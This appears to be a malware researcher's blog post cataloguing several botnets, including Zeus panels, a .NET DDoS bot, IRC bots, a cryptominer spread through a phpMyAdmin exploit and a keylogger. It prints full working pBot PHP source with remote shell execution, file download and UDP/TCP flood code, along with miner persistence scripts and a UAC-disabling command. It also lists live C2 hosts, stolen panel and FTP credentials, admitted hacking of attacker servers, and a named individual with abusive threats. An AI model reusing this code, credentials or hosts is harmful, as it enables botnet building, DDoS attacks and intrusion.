Zbot - 151.236.58.229 - Owned

Here are 2 panels installed on the same host ,the host is hijacked for sure
and the owner was so nice to let the root user whiout a password , same thing for the ftp uses default xampp user and pass for nix , thanks for that btw lol , samples are attached at the end password is "infected"

user : admin
pass : badoo123

user : admin
pass : badoo123

hxxp://www.filehost.ro/31418144/infected_rar/
pass : infected

Blue Botnet - HTTP Botnet

Found a sample in the wild .



the sample was uncrypted as well and its coded in .NET C# also .



also lets take a look inside ( .NET )



Traced bot back and found the host , hacked it , got his panel.rar lol so following pictures are just a demo
on my local net ..

// index.php 
?php
error_reporting(E_ERROR | E_PARSE);
if (file_exists("phash") == false){
 header("Location: register.php");
} else {
 $filename = "phash";
 $fp = fopen($filename, "r");
 $content = fread($fp, filesize($filename));
 fclose($fp);
 $storedPassHash = $content;
 $passHash = $_COOKIE['phash'];
 if (md5("randomsalt".$passHash) != $storedPassHash){
  header("Location: login.php");

Diferent ddos methods uses HTTP Proxy flood , Wordpres Pingback (xmlrpc) , TCP etc ...
looks like HyperBeamEngine



a demo of TCP flood , it requests
botserver/panel/target.ip
botserver/panel/target.method
botserver/panel/target.port





HTTP Flood , http proxys of setting are saved here " botserver/panel/proxy " thats how the bot reads it
if the target.method is HTTPFLOOD







Wordpress Pingback or how he calls it PRESS same as at the HTTPFLOD but here is the file savend uder
botserver/panel/blog thats the file which we add hosts at setting



an online running botnet i found is here :

hxxp://burimche.net/help/login.php
// all online ip's of bots
hxxp://burimche.net/help/visitors.txt
hxxp://burimche.net/help/target.ip
hxxp://burimche.net/help/target.method
hxxp://burimche.net/help/target.port
// online bots
hxx://burimche.net/help/botlogger.php

Want Sample and Panel ? conntact me at email , for research purposes only !!

Zeus / Cryptlocker - skid - information@jupimail.com

Found an easy modified zeus panel , after puting a shell into
so we got user and pass from database i found there was an
script enabled for download and execute a file see at pic3







Virustotatl update.src .. this is a cryptlocker



also the desktop after it execution



So it give's an email address and says that conntact him and send him an sum from 100$ then we get our files back ,
so i wrote him an email just for fun and after some conversation i told him i dont know what bitcoin is im just a stupid
user that lost his data and just want my data back, he responded like this



also an identity of a person , not sure if he is or like he said just a drop but he also send me other name's



I almost got him lol see following picture ..



and ye this was hist last message , PS lulz at his english

Bro you seriousl or you malware reserceher?


i give you valid details

My name is Ivan Fedorov

i am in Latvia




You sure you wont myhelp

i am sent you N7 msg

any who REALY need data computer ASK N1 GET BITCOIN


MAKE IN 48 HOURZ


I UZE ZEUS BOTNETZ

ANTI CORUPTIONZ ANTI ILLUMINATI SYSEM

HOW YOU R MOMA DIE SLOW IN HOSPITAL

YOU BE SOME 1 GUY RUS HOW YOU ПИДАРАЗ
MAKE PAUZE YOUR SELF!


ты вставляешь пралки в калеса я рублюза за норм и не трогаю руских


ты тебя мама кормит она скора умрет и будет повышенпие оплат за квартиры и за еду и комунальных услуг и тд


короче нахуй ты мне тут мозг ееш и на тебя размениваться

ЧТОБ ТВОЯ МАМА УМЕРЛА


YOUR MOM EAT MY EXE

DON KILUMINATI 7 DAY THEORY

IRC Botnet - 218.200.153.154 - PWNED

I don't know if this kid is just stupid or he really trying to dox me ,
if so keep it going lol . Another attack from him on my honeypot

and aggain he is using an IRC server for hosting bot's

PWNED aggain .. lolz

Bot - botnet1.zapto.org - IRC

dns : botnet1.zapto.org
dns2: nhg24.zapto.org

>> PASS NhG
<< NOTICE AUTH :*** eh...
>> NICK Taze{NhG-XP-USA}595632
>> USER 2847 "" "TsGh" :2847
<< 001 Taze{NhG-XP-USA}595632
<< 002 Taze{NhG-XP-USA}595632
<< 003 Taze{NhG-XP-USA}595632
<< 004 Taze{NhG-XP-USA}595632
<< 005 Taze{NhG-XP-USA}595632
<< 005 Taze{NhG-XP-USA}595632
<< 005 Taze{NhG-XP-USA}595632
<< 422 Taze{NhG-XP-USA}595632 :MOTD File is missing
>> JOIN #!Nh!# NhG
>> PING :HTTP1.4
>> PONG :HTTP1.4

Miner Spreading over Zmeu

Infected machine cpu at 100% , bin execution dir was C:\appserv\phpmyadmin\ , following the logs it got infected throu that pma exploit


init.exe - SFX archive that calls another SFX arch called sys,exe

sys.exe

run.bat

@ECHO OFF
START /WAIT /B taskkill /F /IM init.exe > nul
ping -n 3 -w 2 127.0.0.1 > nul
call geox.exe -pula
:end

geox..exe

run.bat - sets mode hiden on folder's

@ECHO OFF
setx GPU_MAX_ALLOC_PERCENT 100
setx GPU_USE_SYNC_OBJECTS 1
START /WAIT /B regedit /s %SystemRoot%\init\spoolv32\reg.reg
START /WAIT /B %SystemRoot%\init\spoolv32\bash
START /WAIT /B regedit /s %SystemRoot%\init\spoolv64\reg.reg
START /WAIT /B %SystemRoot%\init\spoolv64\bash
START attrib +H +S %SystemRoot%\init

reg.reg / sets itself at startup services
 

Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost\Parameters]

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost\Parameters]
"Application"="\"C:\\Windows\\init\\spoolv32\\bash.lnk\""
"AppDirectory"="\"C:\\Windows\\init\\spoolv32\\bash.lnk\""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"spoolv"="\"C:\\Windows\\init\\spoolv32\\bash.lnk\""

bash.lnk - also stars miner whith following command , host , user and pass

%SystemRoot%\init\hstart.exe /NOCONSOLE /SILENT /D="%SystemRoot%\init\spoolv32" /HIGH "%SystemRoot%\init\spoolv32\init.exe -o stratum+tcp://stratum.wemineftc.com:80 -O geox.1:x"

init.exe - miner exe also a help command on it .



VirusTotal  - Malwr

pBot - 167.114.128.120 - IRC

LOL




He uses zmeu scanner and pma exploit to spread a php botnet !
here is bot script

<?php
set_time_limit(0); 
error_reporting(0);
ignore_user_abort(true);

$dir = getcwd();
$uname= @php_uname();

function whereistmP()
{
        $uploadtmp=ini_get('upload_tmp_dir');
        $uf=getenv('USERPROFILE');
        $af=getenv('ALLUSERSPROFILE');
        $se=ini_get('session.save_path');
        $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
        if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
        if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
        if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
        if(is_dir($uf) && is_writable($uf))return $uf;
        if(is_dir($af) && is_writable($af))return $af;
        if(is_dir($se) && is_writable($se))return $se;
        if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
        if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
        return '.';        
}
function srvshelL($command)
{
        $name=whereistmP()."\\".uniqid('NJ');
        $n=uniqid('NJ');
        $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
        win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
        win32_start_service($n);
        win32_stop_service($n);
        win32_delete_service($n);
        while(!file_exists($name))sleep(1);
        $exec=file_get_contents($name);
        unlink($name);
        return $exec;
}
function ffishelL($command)
{
        $name=whereistmP()."\\".uniqid('NJ');
        $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
        $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
        while(!file_exists($name))sleep(1);
        $exec=file_get_contents($name);
        unlink($name);
        return $exec;
}
function comshelL($command,$ws)
{
        $exec=$ws->exec("cmd.exe /c $command");
        $so=$exec->StdOut();
        return $so->ReadAll();
}
function perlshelL($command)
{
        $perl=new perl();
        ob_start();
        $perl->eval("system(\"$command\")");
        $exec=ob_get_contents();
        ob_end_clean();
        return $exec;
}
function Exe($command)
{
        $exec=$output='';
        $dep[]=array('pipe','r');$dep[]=array('pipe','w');
        if(function_exists('passthru')){ob_start();@passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();}
        elseif(function_exists('system')){$tmp=ob_get_contents();ob_clean();@system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;}
        elseif(function_exists('exec')){@exec($command,$output);$output=join("\n",$output);$exec=$output;}
        elseif(function_exists('shell_exec'))$exec=@shell_exec($command);
        elseif(function_exists('popen')){$output=@popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);}
        elseif(function_exists('proc_open')){$res=@proc_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);}
        elseif(function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=winshelL($command);
        elseif(function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=srvshelL($command);
        elseif(extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=ffishelL($command);
        elseif(extension_loaded('perl'))$exec=perlshelL($command);
        return $exec;
}

class pBot
{
 var $config = array("server"=>"167.114.128.120", "port"=>"6668","key"=>"","prefix"=>"", "maxrand"=>"5", "chan"=>"#Boxes","trigger"=>".","hostauth"=>"god.net"); 
 var $users = array(); 
 function start()
 {
    while(true)
 {
     if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30))) $this->start(); 
     $ident = $this->config['prefix'];
     $alph = range("0","9");
     for($i=0;$i<$this->config['maxrand'];$i++) $ident .= $alph[rand(0,9)];
     $this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
     $this->set_nick();
     $this->main();
 }
}
 function main()
 {
    while(!feof($this->conn))
    {
 if(function_exists('stream_select'))
 {
 $read = array($this->conn);
 $write = NULL;
 $except = NULL;
 $changed = stream_select($read, $write, $except, 30);
 if($changed == 0)
 {
  fwrite($this->conn, "PING :lelcomeatme\r\n");
  $read = array($this->conn);
         $write = NULL;
         $except = NULL;
         $changed = stream_select($read, $write, $except, 30);
  if($changed == 0) break;
 }
 }
       $this->buf = trim(fgets($this->conn,512)); 
       $cmd = explode(" ",$this->buf); 
       if(substr($this->buf,0,6)=="PING :") { $this->send("PONG :".substr($this->buf,6)); continue; }
       if(isset($cmd[1]) && $cmd[1] =="001") { $this->join($this->config['chan'],$this->config['key']); continue; } 
       if(isset($cmd[1]) && $cmd[1]=="433") { $this->set_nick(); continue; }
       if($this->buf != $old_buf) 
       { 
          $mcmd = array(); 
          $msg = substr(strstr($this->buf," :"),2); 
          $msgcmd = explode(" ",$msg); 
          $nick = explode("!",$cmd[0]); 
          $vhost = explode("@",$nick[1]); 
          $vhost = $vhost[1]; 
          $nick = substr($nick[0],1); 
          $host = $cmd[0]; 
          if($msgcmd[0]==$this->nick) for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i+1];
          else for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i];

          if(count($cmd)>2) 
          { 
             switch($cmd[1]) 
             {
                case " ": 
                   if(true) 
                   {
                      if(substr($mcmd[0],0,1)==".") 
                      { 
                         switch(substr($mcmd[0],1)) 
                         {
                            case " ":
                               if(count($mcmd)>4) 
                               { 
                                  $header = "From: <".$mcmd[2].">"; 
                                  if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header)) 
                                  { 
                                     $this->privmsg($this->config['chan'],"[\2mail\2]: failed sending.");
                                  } 
                                  else 
                                  { 
                                     $this->privmsg($this->config['chan'],"[\2mail\2]: sent."); 
                                  } 
                               } 
                            break;
                            case "dns": 
                               if(isset($mcmd[1])) 
                               { 
                                  $ip = explode(".",$mcmd[1]); 
                                  if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3])) 
                                  { 
                                     $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1])); 
                                  } 
                                  else 
                                  { 
                                     $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1])); 
                                  } 
                               } 
                            break;
                            case " ":
                               if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
                               else { $safemode = "off"; }
                               $uname = php_uname();
                               $this->privmsg($this->config['chan'],"[\2info\2]: ".$uname." (safe: ".$safemode.")");
                            break;
                            case " ": 
                               $this->set_nick(); 
                            break; 
                            case " ":
                               $this->send(strstr($msg,$mcmd[1])); 
                            break; 
                            case " ":
   
           ob_start();
                                eval(strstr($msg,$mcmd[1]));
           $exec=ob_get_contents();
    ob_end_clean();
                               $ret = explode("\n",$exec);
                               for($i=0;$i<count($ret);$i++) if($ret[$i]!=NULL) $this->privmsg($this->config['chan'],"      : ".trim($ret[$i])); 
                            break;
                            case " ": 
                               $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); 
                               $exec = Exe($command); 
                               $ret = explode("\n",$exec);
                               for($i=0;$i<count($ret);$i++) if($ret[$i]!=NULL) $this->privmsg($this->config['chan'],"      : ".trim($ret[$i])); 
                            break;
                            case " ": 
                               if(count($mcmd)>2) 
                               { 
                                  $this->config['server'] = $mcmd[1]; 
                                  $this->config['port'] = $mcmd[2]; 
                                  if(isset($mcmcd[3])) 
                                  { 
                                   $this->config['pass'] = $mcmd[3]; 
                                   $this->privmsg($this->config['chan'],"[\2update\2]: info updated ".$mcmd[1].":".$mcmd[2]." pass: ".$mcmd[3]); 
                                  } 
                                  else 
                                  { 
                                     $this->privmsg($this->config['chan'],"[\2update\2]: switched server to ".$mcmd[1].":".$mcmd[2]); 
                                  }
      fclose($this->conn);    
                               } 
                            break; 
                            case " ": 
                               if(count($mcmd) > 2) 
                               { 
                                  if(!$fp = fopen($mcmd[2],"w")) 
                                  { 
                                     $this->privmsg($this->config['chan'],"[\2download\2]: could not open output file."); 
                                  } 
                                  else 
                                  { 
                                     if(!$get = file($mcmd[1])) 
                                     { 
                                        $this->privmsg($this->config['chan'],"[\2download\2]: could not download \2".$mcmd[1]."\2"); 
                                     } 
                                     else 
                                     { 
                                        for($i=0;$i<=count($get);$i++) 
                                        { 
                                           fwrite($fp,$get[$i]); 
                                        } 
                                        $this->privmsg($this->config['chan'],"[\2download\2]: file \2".$mcmd[1]."\2 downloaded to \2".$mcmd[2]."\2");
                                     } 
                                     fclose($fp); 
                                  } 
                               }
                               else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); }
                            break;
                            case "udpflood": 
                               if(count($mcmd)>4) { $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]); } 
                            break; 
                            case "tcpconn": 
                               if(count($mcmd)>5) { $this->tcpconn($mcmd[1],$mcmd[2],$mcmd[3]); } 
                            break;
                         } 
                      } 
                   } 
                break; 
             } 
          } 
       }
    } 
 } 
 function send($msg) { fwrite($this->conn,$msg."\r\n"); } 
 function join($chan,$key=NULL) { $this->send("JOIN ".$chan." ".$key); } 
 function privmsg($to,$msg) { $this->send("PRIVMSG ".$to." :".$msg); }
 function notice($to,$msg) { $this->send("NOTICE ".$to." :".$msg); }
 function set_nick()
 {
    $this->nick = "";
    if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $this->nick .= "Linux|";
    else $this->nick .= "Linux|";
    if(isset($_SERVER['SERVER_SOFTWARE']))
    {
       if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache")) $this->nick .= ""; 
       elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis")) $this->nick .= ""; 
       elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami")) $this->nick .= ""; 
       elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"nginx")) $this->nick .= ""; 
       else $this->nick .= ""; 
    }
    else
    {
       $this->nick .= "";
    }
    $this->nick .= $this->config['prefix']; 
    for($i=0;$i<$this->config['maxrand'];$i++) $this->nick .= mt_rand(0,9); 
    $this->send("NICK ".$this->nick);
 } 
  function udpflood($host,$port,$time,$packetsize) {
 $this->privmsg($this->config['chan'],""); 
 $packet = "";
 for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
 $end = time() + $time;
 $multitarget = false;
 if(strpos($host, ",") !== FALSE)
 {
  $multitarget = true;
  $host = explode(",", $host);
 }
 $i = 0;
 if($multitarget)
 {
  $fp = array();
  foreach($host as $hostt) $fp[] = fsockopen("udp://".$hostt,$port,$e,$s,5);

  $count = count($host);
  while(true)
  {
         fwrite($fp[$i % $count],$packet);
   fflush($fp[$i % $count]);
   if($i % 100 == 0)
   {
    if($end < time()) break;
   }
   $i++;
  }

         foreach($fp as $fpp) fclose($fpp);
 } else {
  $fp = fsockopen("udp://".$host,$port,$e,$s,5);
  while(true)
  {
         fwrite($fp,$packet);
   fflush($fp);
   if($i % 100 == 0)
   {
    if($end < time()) break;
   }
   $i++;
  }
         fclose($fp);
 }
 $env = $i * $packetsize;
 $env = $env / 1048576;
 $vel = $env / $time;
 $vel = round($vel);
 $env = round($env);
 $this->privmsg($this->config['chan'],"".$env."".$vel."");
}
 function tcpconn($host,$port,$time) 
 { 
    $this->privmsg($this->config['chan'],"[\2TcpConn Started!\2]"); 
    $end = time() + $time;
    $i = 0;
    while($end > time())
    {
 $fp = fsockopen($host, $port, $dummy, $dummy, 1);
 fclose($fp);
        $i++;
    }
    $this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: sent ".$i." connections to $host:$port."); 
 }
} 
$bot = new pBot; 
$bot->start(); 
?>

ragebot - 61.236.93.74 - IRC

Server : 61.236.93.74 
// hxxp://whois.domaintools.com/61.236.93.74
Port : 6667/tcp  open irc Unreal ircd
Channels : #g0tme# , #pwned#
// traffic on that 
<< MODE raGe|iuxwTmMNJS :+iwG
>> JOIN #g0tme#
<< JOIN :#g0tme#
<< 332 raGe|iuxwTmMNJS #g0tme# :!xpl 94 1 222.x.x.x 3 1 222.x.x.x 3 1
<< 333 raGe|iuxwTmMNJS #g0tme# root 1422314449
>> PRIVMSG #g0tme# :\x0314,1.:[\x0315,1rAGEBoT\x0314,1]:.\x0315,1 range: 222.x.x.x with 94 threads. (autorooting)
<< 404 raGe|iuxwTmMNJS #g0tme# :You must have a registered nick (+r) to talk on this channel (#g0tme#)
// run's under the process name system32dll.exe
// bot commands commands: botinfo/rarworm/xpl/p2p/vncstop/disconnect/reconnect/nick/restart/part/join/
// host auth md5 crypted 630e20d41ee020459be07f5e8b7810dc : root.edu
// delete and download command md5 crypted099af53f601532dbd31e0ea99ffdeb64 - deletefd456406745d816a45cae554c788e754 - download
// VNC brutefore used paswswords password
11111111
12345678
1234567
123456

Plain bin and a report serach malwr for : 81062eeec1984689b90fc38dc1bfcc6b

Keylogger - 77.221.130.21

Creates reports for ( processes , logged key, and url's ) and save's em into here :

Server : 77.221.130.21 Port : 21
USER z92681.
PASS MzG5k6N2n..
OPTS utf8 on..
PWD..CWD /lo/..
// user and pass
0K9dg2kQEl+THDzDsftcRA==
1.0.0.0
127.0.0.1 
3drRPuLbQmixloQTAAYA1g==
// start up 
.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

// Sample and a Malwr report serach : 3b56c66455c3b1a82bcd56da18df9c38

22k ZmEu Botnet

On my Honeypot found this connection , i was and IRC serv running on that server



Connting to that oort ... 


-Lets check security of his server !! oh



Also many connections on that port which IRC serv is running


Got his config and lets join irc ..


Many bots! 26k


/list

2 admin's IP addresses 

Now i checked some log's of the infected pc's and found thiss ...

also he is spreading over a script that seraches for weak or no pass mysql php panel's
and infect them also /panel/script/setup.php this is an tool which HF skidds uses
its called the ZmEu masscan later more on that .
Also 14.35.234.212 was his scanning / spreading server
let's see if that better secured ... lolz 

 you see its an perl script that attacks filtered ip addresses that have
phpmyadmin panel online or vulnarable | ps aux

so located his script /bin/.php/
i attach later a archive whith all his data
see all *.txt files are vuln phpmyadmin panel that can maybe exploited

cat all.pl 
http://pastebin.com/JZnMHGGE
i paste just this here 
my $url = $host;
my $ftp = "ftp://185.4.29.127/a/0.php";
my $len = length($ftp);
every exploited pc , is forced to download this file over ftp
cat 0.php
http://pastebin.com/g75MAgjz
its a php bot 
    "server" => "222.216.30.28",
    "port" => "3131",
    "key" => "*",
    "prefix" => "",
    "maxrand" => "8",
    "chan" => "#dd0s#",
    "trigger" => ".",
    "hostauth" => "root.edu"
there are some other file's
cat a.php 
http://pastebin.com/CKs5fRkv
cat ax.php
http://pastebin.com/GC3dcuyz
cat win.php
http://pastebin.com/3Np2JsYw

-All data will be attached soon as archive ..
More about pma bot Here